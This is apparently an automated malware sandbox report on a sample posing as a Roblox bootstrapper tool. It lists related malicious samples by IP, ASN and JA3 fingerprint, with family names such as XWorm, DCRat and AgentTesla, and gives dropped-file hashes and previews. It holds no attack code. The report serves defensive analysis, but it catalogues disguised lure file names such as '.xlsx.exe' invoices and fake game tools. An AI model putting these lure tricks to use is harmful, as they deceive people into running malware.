                                                                                                                                                                                                            SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                            8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.93.27
                                                                                                                                                                                                            edge-term4-fra2.roblox.comoIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 128.116.123.3
                                                                                                                                                                                                            BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.123.3
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.123.3
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.123.3
                                                                                                                                                                                                            SolaraBootstrapper.exeGet hashmaliciousDCRat, XWormBrowse
                                                                                                                                                                                                            • 128.116.123.3
                                                                                                                                                                                                            nodejs.orgcgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.22.46
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                            • 104.20.22.46

                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            ROBLOX-PRODUCTIONUSla.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.110.16
                                                                                                                                                                                                            cgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 128.116.21.4
                                                                                                                                                                                                            oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 128.116.123.3
                                                                                                                                                                                                            8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                                                                                                                                                            • 128.116.44.3
                                                                                                                                                                                                            https://www.roblox.sc/users/294681399108/profileGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.122.3
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.44.3
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.44.3
                                                                                                                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.44.4
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 128.116.119.3
                                                                                                                                                                                                            TUT-ASUS5K9iuU0ALY.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            hQr269FZU1.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            loader.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.MulDrop28.33962.19660.9173.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            New Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            fEv4R2ahiLCQa5O.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            PW68YarHboeikgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            eETnl6XIwnGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                            CLOUDFLARENETUSSecuriteInfo.com.Win64.MalwareX-gen.31244.2279.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.26.1.5
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.26.1.5
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                            • 104.20.4.235
                                                                                                                                                                                                            SecuriteInfo.com.Win64.CrypterX-gen.31361.18171.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.26.0.5
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.TR.Redcap.cdtxw.10783.3124.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            f6ffg1sZS2.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            wo4POc0NG1.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 172.67.170.64
                                                                                                                                                                                                            K3SRs78CAv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 104.21.95.91
                                                                                                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                            • 172.64.41.3
                                                                                                                                                                                                            CLOUDFLARENETUSSecuriteInfo.com.Win64.MalwareX-gen.31244.2279.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.26.1.5
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.26.1.5
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                            • 104.20.4.235
                                                                                                                                                                                                            SecuriteInfo.com.Win64.CrypterX-gen.31361.18171.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.26.0.5
                                                                                                                                                                                                            SecuriteInfo.com.Trojan.TR.Redcap.cdtxw.10783.3124.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            f6ffg1sZS2.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            wo4POc0NG1.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 172.67.170.64
                                                                                                                                                                                                            K3SRs78CAv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                            • 104.21.95.91
                                                                                                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                            • 172.64.41.3

                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            sheisverynicegirlwithgreatworkingskillwithgereatniceworkign.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            seemeherewithgreatthingsentiretimewithgreatthingsonhere.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            seethebestthingswhichgivennewthingswithmewesee.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            Factura-2410-CFDI.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            SUNNY HONG VSL PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            • 104.20.23.46
                                                                                                                                                                                                            WINNING DILIGENCE - VESSEL PARTICULARS.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                            • 172.67.203.125
                                                                                                                                                                                                            • 128.116.123.4
                                                                                                                                                                                                            • 104.20.23.46

                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\_bz2.pyd5K9iuU0ALY.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI76122\VCRUNTIME140.dll5K9iuU0ALY.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                                                                                                                                                                grA6aqodO5.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                                                                                                  cPl7CoJTBx.exeGet hashmaliciousLuna Grabber, Luna LoggerBrowse
                                                                                                                                                                                                                    R6IuO0fzec.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                                                                                                      SecuriteInfo.com.Win64.Malware-gen.11853.10965.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        SecuriteInfo.com.Gen.Variant.Lazy.564550.16803.23255.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          H2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse

                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bound.exe_e1713a4d8d19182fc4a76a4d16041566ccfdee1_3c646ca9_a444fff1-7585-4c34-bbbb-0404a4d25c0e\Report.wer

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                            Entropy (8bit):1.2565504248793764
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:XzdP678r0bU9+dQ+bGaWxejol2/fsLzuiFDZ24lO8Kgz:pP+DbG+dQlaml23sLzuiFDY4lO81
                                                                                                                                                                                                                            MD5:D8E645E0BA4CBBC5E5CB1385FC04D704
                                                                                                                                                                                                                            SHA1:BA7696702BE9B52AAB213C76CF70FBD84503DB2B
                                                                                                                                                                                                                            SHA-256:A65A038EFA9FFD303D64509F9C98ADABF71ECF224D8674B6543269831E6F660A
                                                                                                                                                                                                                            SHA-512:61CD83ABC8EC2566B5438B62B7745756E4E086661E1FE5982081ABFDF11492DB4F8795F03ECC0919AA7121AFB74F9D72F2C9B591931B822540B1DC7E0881C5D5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.5.2.4.6.7.8.2.1.5.8.8.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.5.2.4.6.7.9.0.4.3.9.8.3.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.4.4.f.f.f.1.-.7.5.8.5.-.4.c.3.4.-.b.b.b.b.-.0.4.0.4.a.4.d.2.5.c.0.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.3.7.c.7.6.2.6.-.f.0.a.5.-.4.d.e.d.-.b.4.c.f.-.d.1.8.9.7.b.7.3.3.3.5.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.b.o.u.n.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.o.l.a.r.a.B.o.o.t.s.t.r.a.p.p.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.2.8.-.0.0.0.1.-.0.0.1.4.-.4.9.9.3.-.b.0.d.d.9.7.2.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.f.e.1.7.3.6.3.1.c.a.d.c.4.a.7.6.9.5.d.3.9.9.5.7.a.1.2.d.e.9.c.0.0.0.0.0.0.0.0.!.0.0.0.0.2.1.f.2.3.2.c.2.f.d.8.1.3.2.f.8.6.7.7.e.5.3.2.5.8.5.6.2.a.d.9.8.b.4.5.5.e.6.7.9.!.b.o.u.n.d...

                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER40B.tmp.dmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                            File Type:Mini DuMP crash report, 16 streams, Sun Oct 27 17:44:38 2024, 0x1205a4 type
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):623002
                                                                                                                                                                                                                            Entropy (8bit):3.257653588430877
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:zeGcjs2V3Qa6b334KDW8VuiBv8gD2NXriqrJDW:ze7Qa6b334T8VXBv1D25riq
                                                                                                                                                                                                                            MD5:EED56D11F4A1B2B795CFBBF9540D0A5A
                                                                                                                                                                                                                            SHA1:54067A8D37D0519D10DC7277BE2B5AACFC313B28
                                                                                                                                                                                                                            SHA-256:348103821A178550C5EA842A36C368BDACF747260C632BB2F793056C20213DBE
                                                                                                                                                                                                                            SHA-512:EB7A36089D5BB266C0DAEAECAA8EBD9FFC6B3E5FEDB929E017A016474332551DFC6D32436DA314391ED7CA96F016CCE7FAC0C5B8C8B9760CD6823B4BC45E51E1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MDMP..a..... ........|.g............d...........<...........<....)...........)......tT..............l.......8...........T............W...*...........F...........G..............................................................................eJ.......H......Lw......................T.......(....{.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER610.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):6770
                                                                                                                                                                                                                            Entropy (8bit):3.721030363750419
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJccZrt3qYZW8qprK89b3zVf0l9m:R6lXJnZrt3qYUP3hfr
                                                                                                                                                                                                                            MD5:91679ED9E509F98973AC0ACC3C0F88AF
                                                                                                                                                                                                                            SHA1:BB4D36E3956735A1185C00797D1D9387A694A33E
                                                                                                                                                                                                                            SHA-256:8CF682A57D82D0BAB2B4ED33BD322060F77E3CEEB346F9C91252D6934BAB62E1
                                                                                                                                                                                                                            SHA-512:BA9F8DCD439E9DBD884EAB325D52810BAED31BF0239F889D876549EBB76CBC4CE827DB68EC4405DB472D1A1F161C5F3C3F83B9AC416F589A71C131C6EDA78739
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.7.6.<./.P.i.

                                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER64F.tmp.xml

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4774
                                                                                                                                                                                                                            Entropy (8bit):4.4499618263179075
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zszJg771I94LWpW8VYtYm8M4J/T/Fkyq8v1T415LeBd:uIjfNI7z67VVJWWy15L6d
                                                                                                                                                                                                                            MD5:17F377B1CE34503A2B948E8904192ACB
                                                                                                                                                                                                                            SHA1:28AA443E500E87DE91EBAFBCC8C3B166221A76B8
                                                                                                                                                                                                                            SHA-256:1C0B627FA1700A90D013BC0C5445FB6FF084201585235D42901E213E847DD345
                                                                                                                                                                                                                            SHA-512:F332A6AB9A21DD830C1BB75ADC415AF74C7805B35DAB9C40C72CE97EF1CF1BB3687B31D01FE32EF8F5AF09D90A24B7883571E0540A7016ECDA3A22D84D036380
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="562127" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                                                                                                                                            MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                                                                                                                                            SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                                                                                                                                            SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                                                                                                                                            SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:@...e................................................@..........

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\DISCORD

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):103
                                                                                                                                                                                                                            Entropy (8bit):4.081427527984575
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:XSWHlkHFWKBgdvHvIhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0aivQLkWFfx/52uyPm
                                                                                                                                                                                                                            MD5:B016DAFCA051F817C6BA098C096CB450
                                                                                                                                                                                                                            SHA1:4CC74827C4B2ED534613C7764E6121CEB041B459
                                                                                                                                                                                                                            SHA-256:B03C8C2D2429E9DBC7920113DEDF6FC09095AB39421EE0CC8819AD412E5D67B9
                                                                                                                                                                                                                            SHA-512:D69663E1E81EC33654B87F2DFADDD5383681C8EBF029A559B201D65EB12FA2989FA66C25FA98D58066EAB7B897F0EEF6B7A68FA1A9558482A17DFED7B6076ACA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{. "args" : {. "code" : "8PgspRYAQu". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):894
                                                                                                                                                                                                                            Entropy (8bit):3.1235837540248492
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:Q58KRBubdpkoPAGdjrZN6Ak9+MlWlLehW51IC4N6p:QOaqdmOFdjrz6j+kWResLIL6p
                                                                                                                                                                                                                            MD5:6477E6189F8624379D00ABE46DD01C6C
                                                                                                                                                                                                                            SHA1:BA5353383C87FF524A141A8F97702E64FAC39141
                                                                                                                                                                                                                            SHA-256:A54CC47BDC0BF41CD3BEE282589935CF903A91023C144AD117A3F35FEC5C7157
                                                                                                                                                                                                                            SHA-512:FD03326C68807D69EFB6FC692F911599025F2F67E7462DC36567F3123A19BE8D2E93FC2CBA94C4081247F1019FA4EED1FE0902618F11BE38AB2D61563CF9BC14
                                                                                                                                                                                                                            Malicious:false
